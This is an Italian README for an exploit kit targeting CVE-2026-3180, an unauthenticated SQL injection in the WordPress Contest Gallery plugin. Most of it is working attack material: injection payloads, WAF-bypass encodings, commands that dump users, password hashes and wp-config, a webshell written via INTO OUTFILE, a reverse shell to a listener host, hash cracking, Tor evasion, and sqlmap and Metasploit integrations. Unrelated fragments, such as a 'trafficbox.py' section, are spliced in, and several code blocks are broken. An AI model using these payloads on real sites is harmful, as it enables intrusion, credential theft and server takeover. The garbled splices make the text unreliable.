
Kit di sfruttamento completo per la vulnerabilità SQL Injection CVE-2026-3180 - WordPress Contest Gallery. Include estrazione automatica dei dati, bypass WAF, reverse shell, integrazione con SQLMap, generazione di estensioni Burp e reporting per penetration testing e ricerca sulla sicurezza.
Strumento di valutazione proof-of-concept per CVE-2026-3180
Autore: Sudeepa Wanigarathna · Scoperta originale: cardosource
[!IMPORTANT] Solo per uso autorizzato. Questo strumento è destinato alla ricerca sulla sicurezza, all'istruzione e al test di sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.
CVE-2026-3180 è una SQL injection cieca, ad alta gravità e non autenticata nel plugin Contest Gallery di WordPress. Il difetto si trova nel gestore AJAX post_cg1l_resend_unconfirmed_mail_frontend, dove il parametro cgl_mail viene passato a una query SQL senza una corretta sanitizzazione.
Questo repository fornisce un PoC Python completo (v2.0) per professionisti della sicurezza autorizzati per convalidare l'impatto, estrarre dati WordPress, generare report e integrarsi con strumenti standard del settore (SQLMap, Burp Suite, Nuclei).
| Campo | Valore |
|---|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20
### Riferimenti
- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [Articolo originale (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)
---
## Funzionalità
### Sfruttamento Principale
| Capacità | Descrizione |
|---|---|
| Rilevamento vulnerabilità | Test boolean, basati sul tempo, su errori, UNION e stacked query |
| Estrazione blind | Estrazione di caratteri tramite ricerca binaria per inferenza booleana |
| Dump completo dei dati | Utenti, metadati del database, opzioni, plugin, temi, post, tabelle |
| Shell SQL interattiva | Esegui query `SELECT` arbitrarie sul backend |
| Estrazione di wp-config.php | Tentativi di `LOAD_FILE()` su percorsi comuni |
| Reverse shell | Scrittura webshell PHP tramite `INTO OUTFILE` / `DUMPFILE` (quando consentito) |
### Evasione e Prestazioni
| Capacità | Descrizione |
|---|---|
| Bypass WAF | 15+ tecniche di codifica e offuscamento |
| Multi-threading | Thread worker configurabili per un'estrazione più rapida |
| Limitazione della velocità | Ritardo configurabile tra le richieste |
| Logica di ripetizione | Ripetizioni automatiche su fallimenti transienti |
| Rotazione dello User-Agent | Impronte digitali del browser casuali per richiesta |
| Supporto proxy | Proxy HTTP/SOCKS e Tor (`socks5h://127.0.0.1:9050`) |
### Report e Integrazioni
| Capacità | Descrizione |
|---|---|
| Generazione di report | Report JSON e HTML con riepiloghi dell'estrazione |
| Integrazione SQLMap | Comando SQLMap generato automaticamente con tampers |
| Estensione Burp Suite | Generatore + file autonomo `burp_contest_gallery.py` |
| Template Nuclei | Template YAML per rilevamento di massa |
| Modulo Metasploit | Modulo ausiliario Ruby (`contest_gallery_sqli.rb`) |
| Automazione shell | Script Bash per flussi di lavoro basati su curl e SQLMap |
### Operativi
| Capacità | Descrizione |
|---|---|
| Output CLI colorato | Logging strutturato con livelli di gravità |
| Tracciamento progressi | Metriche in tempo reale (richieste, tempistiche, velocità di estrazione) |
| Modalità silenziosa/verbose | Adatto per scripting e debug |
| Gestione dei segnali | Pulizia graziosa su `Ctrl+C` |
| Pronto per Docker | Supporto per distribuzione containerizzata |
| Pronto per pipeline CI/CD | Codici di uscita e output JSON per automazione |
---
## Installazione
### Prerequisiti
- Python **3.8+**
- `pip`
- Raggiungibilità di rete ai target sotto test
### Strumenti Esterni Opzionali
| Strumento | Scopo |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | Iniezione SQL automatizzata |
| [Burp Suite](https://portswigger.net/burp) | Test manuale e hosting di estensioni |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | Scansione basata su template |
| [Hashcat](https://hashcat.net/hashcat/) | Cracking offline di hash |
| [Tor](https://www.torproject.org/) | Routing anonimo (`--proxy tor`) |
### Configurazione```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
Richiesto (runtime):```text requests>=2.31.0
**Consigliato (da requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
Lo script di sfruttamento principale utilizza solo la libreria standard di Python più
requests. I pacchetti aggiuntivi migliorano l'output e la generazione di report.
Sostituisci
http://target.examplecon un target di laboratorio o autorizzato solo.
python3 cve-2026-3180.py http://target.example --scan
### Sfruttamento completo (rilevamento + estrazione)```bash
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
### Shell SQL interattiva```bash
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
### Attraverso il proxy Burp```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
Esegue rilevamento basato su booleano, temporale e su errori senza estrazione completa.
### Estrazione completa dei dati```bash
python3 cve-2026-3180.py http://target.example --dump all
Estrae informazioni sul database, utenti, opzioni, plugin, temi, post, tabelle e metadati di sistema.
python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes
### Shell SQL interattiva```bash
python3 cve-2026-3180.py http://target.example --sql-shell
curl -X POST http://localhost:9999/scan
-d '{"url": "https://example.com","headless": true}'```text
sql> SELECT DATABASE()
wordpress
sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]
sql> show tables ["wp_users", "wp_posts", "wp_options", ...]
sql> exit
**Comandi shell:**
| Command | Description |
|---|---|
| `SELECT ...` | Esegui una query SQL e stampa il risultato |
| `show users` | Mostra gli utenti estratti in cache |
| `show tables` | Mostra la lista delle tabelle in cache |
| `show database` | Mostra i metadati del DB in cache |
| `show config` | Mostra wp-config.php se estratto |
| `show options` | Mostra le opzioni di WordPress |
| `show plugins` | Mostra i plugin attivi |
| `help` | Elenca i comandi disponibili |
| `exit` / `quit` | Esci dalla shell |
### Generazione del report```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json
# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html
nc -lvnp 4444
python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444
> Richiede il privilegio `FILE`, un webroot scrivibile e che `secure_file_priv` non blocchi il percorso di destinazione.
### Generazione del comando SQLMap```bash
python3 cve-2026-3180.py http://target.example --sqlmap
Oppure usa lo script di automazione incluso:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example
### Estensione di Burp Suite```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension
# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py
python3 cve-2026-3180.py http://target.example --nuclei-template
nuclei -u http://target.example -t CVE-2026-3180.yaml
### Automazione Bash (senza Python)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example
python3 cve-2026-3180.py http://target.example --proxy tor
### Ottimizzazione delle prestazioni```bash
python3 cve-2026-3180.py http://target.example \
--threads 20 \
--timeout 15 \
--delay 0.1 \
--retries 5 \
-v
| Argomento | Descrizione |
|---|---|
target | URL base WordPress target (es. http://target.example) |
| Argomento | Descrizione |
|---|---|
--verbose, -v | Abilita log di debug |
--quiet | Sopprime output console |
--output, |
Lo strumento testa e utilizza automaticamente molteplici strategie di iniezione:
Il PayloadManager ruota attraverso 12+ template di iniezione:```text
'OR//{condition}#@teste.com
'OR{condition}-- -
')OR{condition}#
'))OR{condition}#
'OR//{condition}OR//'1'='1'#
'UNION//SELECT{condition}#
...
### Algoritmo di Estrazione Booleana
1. Conferma la vulnerabilità tramite lunghezze di baseline true/false
2. Ricerca binaria di `LENGTH()` del risultato della query target
3. Ricerca binaria di `ASCII(SUBSTRING(...))` per posizione del carattere
4. Assembla la stringa completa dai caratteri estratti
---
## Bypass WAF
Tecniche di offuscamento integrate applicate casualmente o su richiesta:
| Tecnica | Descrizione |
|---|---|
| `comment_obfuscation` | Sostituisci spazi con `/**/`, `/*!*/`, `-- `, `#` |
| `case_variation` | Maiuscole/minuscole casuali nei caratteri alfabetici |
| `url_encoding` | Percent-encoding standard |
| `double_url_encoding` | Percent-encoding annidato |
| `hex_encoding` | Codifica esadecimale stile `%41` |
| `unicode_encoding` | Codifica unicode stile `%u0041` |
| `white_space_variation` | Tabulazioni, newline, avanzamenti pagina invece di spazi |
| `keyword_obfuscation` | Dividi parole chiave: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | Concatenazione `CHAR()` tramite `\|\|` |
| `char_obfuscation` | Addizione `CHAR()` tramite `+` |
Esempio di payload trasformato:
```sql
http://example.com/page?id=1%27%20UNION%20SELECT%201,2,3--%20
``````text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com
{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }
### Cracking degli hash delle password (offline)
Dopo l'estrazione, cracca gli hash phpass di WordPress con Hashcat:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json
# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Comando generato (tramite --sqlmap):```bash
sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs
### Burp Suite
1. Carica `burp_contest_gallery.py` in **Extender → Extensions → Add**
2. Apri la scheda **CVE-2026-3180**
3. Inserisci l'URL di destinazione e clicca su **Exploit**
4. Lo scanner passivo controlla le richieste AJAX alla ricerca di indicatori di Contest Gallery
### Nuclei```yaml
id: CVE-2026-3180
info:
name: WordPress Contest Gallery SQL Injection
severity: high
classification:
cve-id: CVE-2026-3180
cvss-score: 7.5
requests:
- method: POST
path: /wp-admin/admin-ajax.php
body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/
msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"
## Catena di attacco```mermaid
flowchart TD
A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
B --> C{"Injection type?"}
C -->|Boolean| D["Response length inference"]
C -->|Time| E["SLEEP delay inference"]
C -->|Error| F["SQL error leakage"]
D --> G["Binary-search extraction"]
E --> G
F --> G
G --> H["WordPress data exfiltration"]
H --> I["Users / hashes / options / config"]
I --> J["Optional: OUTFILE webshell"]
post_cg1l_resend_unconfirmed_mail_frontend nel plugin Contest Gallery.cgl_mail concatenato in SQL senza parametrizzazione.[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!
### Struttura del Report JSON```json
{
"metadata": {
"cve": "CVE-2026-3180",
"cvss_score": "7.5 (High)",
"type": "boolean_based"
},
"target": {
"url": "http://target.example",
"ajax_url": "http://target.example/wp-admin/admin-ajax.php"
},
"vulnerability": {
"vulnerable": true,
"type": "boolean_based"
},
"extracted_data": {
"database": { "name": "wordpress", "version": "8.0.35" },
"users": [],
"tables": [],
"plugins": [],
"options": {}
},
"summary": {
"users_found": 3,
"tables_found": 12,
"plugins_found": 8,
"config_extracted": false
}
}
I report sono salvati in reports/ per impostazione predefinita.
FROM python:3.11-slim
WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt
ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]
* **Endpoint**
* Crea endpoint e connettilo alla VLAN:
```
python3 trafficbox.py -t https://10.20.30.200 -k <api_key> -a ep_create -p 6 -v <2>
```
* Elenca endpoint:
```
python3 trafficbox.py -t https://10.20.30.200 -k <api_key> -a ep_list
```
* Rimuovi endpoint:
```
python3 trafficbox.py -t https://10.20.30.200 -k <api_key> -a ep_remove -p <id>
```
* **Genera traffico**
* Ping host:
```
python3 trafficbox.py -t https://10.20.30.200 -k <api_key> -a generate -p hostping -x <endpoint_id> -z <dst IP>
``````bash
# Build
docker build -t cve-2026-3180 .
# Scan
docker run --rm cve-2026-3180 http://target.example --scan
# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
http://target.example --report json
Esempio di workflow GitHub Actions per scansioni di staging autorizzate:```yaml name: CVE-2026-3180 Staging Scan
on: workflow_dispatch: schedule: - cron: '0 2 * * 1'
jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install -r requirements.txt
- name: Vulnerability scan
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--scan --quiet
continue-on-error: true
- name: Generate report
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--report json -o reports/staging.json
- uses: actions/upload-artifact@v4
with:
name: security-report
path: reports/
---
## Risoluzione dei problemi
| Sintomo | Cosa provare |
|---|---|
| Target non vulnerabile | Conferma che Contest Gallery ≤ 28.1.4 sia installato e attivo |
| Nessuna differenza di lunghezza nella risposta | Prova `--scan` per fallback basato sul tempo; aumenta `--timeout` |
| Estrazione molto lenta | Aumenta `--threads`; riduci `--delay` con cautela |
| Errori di connessione | Alza `--timeout` e `--retries`; controlla le impostazioni del proxy |
| WAF blocca le richieste | Usa `--proxy tor`; lo strumento applica automaticamente tecniche di bypass |
| Proxy Tor fallisce | Verifica Tor su `127.0.0.1:9050`; installa `requests[socks]` se necessario |
| Dump utenti vuoto | Il prefisso delle tabelle potrebbe non essere `wp_`; usa `--sql-shell` con query personalizzate |
| wp-config non trovato | Prova `--sql-shell` con percorsi alternativi `LOAD_FILE()` |
| Reverse shell fallisce | Verifica il privilegio `FILE`, `secure_file_priv`, i permessi della webroot |
### Flusso di debug```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v
# Through Burp
python3 cve-2026-3180.py http://target.example \
--proxy http://127.0.0.1:8080 -v --scan
# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
-d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
-w "\nSize: %{size_download}\n"
exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)
---
## Cronologia delle versioni
### v2.0.0 — Edizione Definitiva (Gennaio 2026)
- Rilevamento di iniezioni booleane, temporali, errori, union e stack
- Pipeline completa di estrazione dati da WordPress
- 15+ tecniche di bypass WAF
- Shell SQL interattiva
- Generazione di report JSON / HTML
- Integrazioni con SQLMap, Burp e Nuclei
- Reverse shell tramite `INTO OUTFILE`
- Supporto proxy e Tor
- Multi-threading con logica di ripetizione
- Output colorato e logging strutturato
### v1.0 — Prima versione
- Rilevamento booleano di base
- Estrazione manuale degli utenti
---
## Disclaimer
Questo progetto è fornito **così com'è** per **ricerca sulla sicurezza difensiva** e **test di penetrazione autorizzati**.
Utilizzando questo software accetti che:
1. Prenderai di mira solo sistemi di tua proprietà o per i quali hai esplicitamente ricevuto autorizzazione al test.
2. Comprendi le leggi applicabili in materia di abuso informatico e protezione dei dati.
3. L'autore e i collaboratori **non sono responsabili** per danni, perdita di dati o conseguenze legali derivanti da un uso improprio.
Se scopri questa vulnerabilità in produzione, segui le pratiche di divulgazione responsabile e coordina con il fornitore del plugin / il team di sicurezza di WordPress dove appropriato.
---
## Autore e crediti
| Ruolo | Nome |
|---|---|
| **Autore dello strumento** | Sudeepa Wanigarathna |
| **Scoperta originale** | cardosource |
| **CVE** | CVE-2026-3180 |
| **Licenza** | MIT |
---
## Licenza
---```
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
Solo per test di sicurezza autorizzati.
| Attributo | Valore |
|---|
| ID CVE | CVE-2026-3180 |
| CVSS | 7.5 (Alto) |
| Vettore d'attacco | Rete — non autenticato |
| Impatto | Violazione della riservatezza, lettura del database, furto di credenziali |
| Prodotto interessato | Plugin Contest Gallery di WordPress |
| Versioni affette | 28.1.4 e precedenti |
| Tipo di vulnerabilità | SQL Injection cieca |
| DBMS | MySQL / MariaDB |
| URL | /wp-admin/admin-ajax.php |
| Metodo | POST |
| Azione | post_cg1l_resend_unconfirmed_mail_frontend |
| Parametro vulnerabile | cgl_mail |
| Argomento | Default | Descrizione |
|---|
--proxy | — | URL proxy o tor per SOCKS5 tramite Tor |
--timeout | 10 | Timeout richiesta HTTP (secondi) |
--delay | 0.05 | Ritardo tra richieste (secondi) |
--retries | 3 | Numero di tentativi su richieste fallite |
--threads, -t | 5 | Dimensione del pool di thread |
-o| Percorso file di output personalizzato |
| Argomento | Descrizione |
|---|
| (predefinito) | Exploit completo: rileva → scansiona → estrai tutto |
--scan | Solo rilevamento vulnerabilità |
--sql-shell | Shell SQL interattiva |
--dump {users,config,database,options,plugins,themes,all} | Estrai dati specifici |
--report {json,html} | Genera report di valutazione |
--reverse-shell LHOST LPORT | Tenta reverse shell tramite scrittura file |
--sqlmap | Stampa comando SQLMap |
--burp-extension | Genera estensione Burp Suite |
--nuclei-template | Genera template Nuclei YAML |
| Tipo | Metodo di Rilevamento | Caso d'Uso |
|---|
| Basata su booleani | Differenziale lunghezza risposta (1=1 vs 1=2) | Motore di estrazione principale |
| Basata su temporali | Inferenza ritardo SLEEP() | Fallback quando i segnali booleani sono deboli |
| Basata su errori | EXTRACTVALUE() / stringhe di errore SQL | Metadati veloci quando gli errori vengono esposti |
| Basata su UNION | Payload UNION SELECT | Recupero diretto del valore (quando applicabile) |
| Query impilate | sintassi '; ... # | Esecuzione multi-istruzione (raro) |
| Target | Sorgente SQL | Chiave di output |
|---|
| Nome del database | SELECT DATABASE() | database.name |
| Versione DB | SELECT VERSION() | database.version |
| Utente DB | SELECT USER() | database.user |
| Tabelle | information_schema.TABLES | tables[] |
| Colonne | information_schema.COLUMNS | columns{} |
| Utenti WP | wp_users | users[] |
| Hash delle password | wp_users.user_pass | users[].password_hash |
wp_users.user_email | users[].email | |
| Ruoli | wp_usermeta capabilities | users[].roles |
| Opzioni del sito | wp_options | options{} |
| Plugin attivi | wp_options.active_plugins | plugins[] |
| Temi | opzioni template / stylesheet | themes[] |
| Post | wp_posts | posts[] |
| wp-config.php | LOAD_FILE('/var/www/html/wp-config.php') | config |
| Informazioni di sistema | @@hostname, @@datadir, ecc. | system_info{} |